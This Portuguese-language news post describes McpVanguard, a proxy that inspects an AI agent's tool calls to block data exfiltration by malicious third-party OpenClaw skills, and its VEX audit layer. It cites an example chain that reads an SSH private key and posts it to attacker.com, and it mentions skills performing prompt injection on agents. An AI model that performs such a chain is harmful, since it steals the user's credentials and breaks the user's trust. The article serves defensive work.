Proxy McpVanguard Bloqueia Exfiltração de Dados da Habilidade OpenClaw

✍️ OpenClawRadar📅 Publicado: March 20, 2026🔗 Source
Proxy McpVanguard Bloqueia Exfiltração de Dados da Habilidade OpenClaw
Ad

Em resposta à descoberta da equipe de segurança de IA da Cisco de que habilidades de terceiros do OpenClaw realizavam exfiltração silenciosa de dados e injeção de prompt, um desenvolvedor lançou o McpVanguard, um proxy projetado para ficar entre um agente de IA e suas ferramentas para bloquear chamadas maliciosas antes que sejam executadas.

O Problema: Chamadas Maliciosas em Cadeia

A questão de segurança não é um bug no próprio OpenClaw, mas uma consequência dos agentes terem acesso ao sistema de arquivos, execução de shell e chamadas de rede sem limites de aplicação. Os testes da Cisco revelaram um padrão em que chamadas individuais aparentemente inocentes se combinam para criar uma violação, como:

read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)

Nenhuma das chamadas parece maliciosa isoladamente, mas juntas elas exfiltram dados sensíveis. De acordo com a fonte, o ClawHub teve mais de 820 habilidades maliciosas em seu pico, e o CVE-2026-25253 permitia que atacantes alcançassem execução remota de código através de um único link malicioso. A validação atual no nível de habilidade falha em detectar essas sequências de chamadas em cadeia.

Ad

A Solução: Proxy McpVanguard

O McpVanguard aborda isso interceptando chamadas entre o agente e suas ferramentas. Ele usa três métodos de detecção:

  • Correspondência de padrões
  • Pontuação de intenção semântica
  • Detecção de cadeias comportamentais em toda a sessão

A instalação é via pip: pip install mcp-vanguard.

Camada Mais Profunda: Protocolo VEX

O projeto inclui uma camada de segurança mais profunda chamada Protocolo VEX, descrita como um sistema de "gravador de voo". Ele fornece:

  • Trilhas de auditoria Merkle para registro à prova de adulteração
  • Verificação de identidade do agente baseada em TPM
  • Aplicação no nível de chamada do sistema

O Protocolo VEX é construído em Rust e o desenvolvimento começou em dezembro de 2023, antes que o OpenClaw ganhasse popularidade generalizada. A fonte observa que a NVIDIA recentemente lançou o NemoClaw para fins de segurança semelhantes, indicando que esse tipo de ameaça não vai desaparecer.

Ambos os projetos estão disponíveis no GitHub:

📖 Read the full source: r/openclaw

Ad

👀 See Also

MCPwner IA, Ferramenta de Pentest, Encontra Múltiplas Vulnerabilidades 0-Day no OpenClaw
Security

MCPwner IA, Ferramenta de Pentest, Encontra Múltiplas Vulnerabilidades 0-Day no OpenClaw

MCPwner, um servidor MCP que orquestra agentes de IA para testes de penetração automatizados, identificou várias vulnerabilidades críticas de dia zero no OpenClaw, incluindo injeção de variáveis de ambiente, bypass de permissões e falhas de divulgação de informações que os scanners padrão não detectaram.

OpenClawRadar
FORGE: Framework de Teste de Segurança de IA de Código Aberto para Sistemas LLM
Security

FORGE: Framework de Teste de Segurança de IA de Código Aberto para Sistemas LLM

FORGE é um framework autônomo de teste de segurança de IA que constrói suas próprias ferramentas durante a execução, autorreplica-se em um enxame e cobre as 10 principais vulnerabilidades OWASP LLM, incluindo injeção de prompt, fuzzing de jailbreak e vazamento de RAG.

OpenClawRadar
Ferramentas de IA de Código Aberto Apresentam Riscos de Segurança Devido à 'Segurança Ilusória Através da Transparência'
Security

Ferramentas de IA de Código Aberto Apresentam Riscos de Segurança Devido à 'Segurança Ilusória Através da Transparência'

Uma postagem no Reddit alerta sobre malware disfarçado como agentes e ferramentas de IA de código aberto, onde código malicioso pode estar escondido em grandes bases de código que os usuários assumem ser seguras porque estão no GitHub. A postagem descreve como o 'vibe-coding' e os agentes de IA autônomos condicionam os usuários a executar programas desconhecidos sem revisão.

OpenClawRadar
Coldkey: Geração de Chaves na Era Pós-Quântica e Ferramenta de Backup em Papel
Security

Coldkey: Geração de Chaves na Era Pós-Quântica e Ferramenta de Backup em Papel

Coldkey gera chaves age pós-quânticas (ML-KEM-768 + X25519) e produz backups HTML de página única para impressão com códigos QR para armazenamento offline.

OpenClawRadar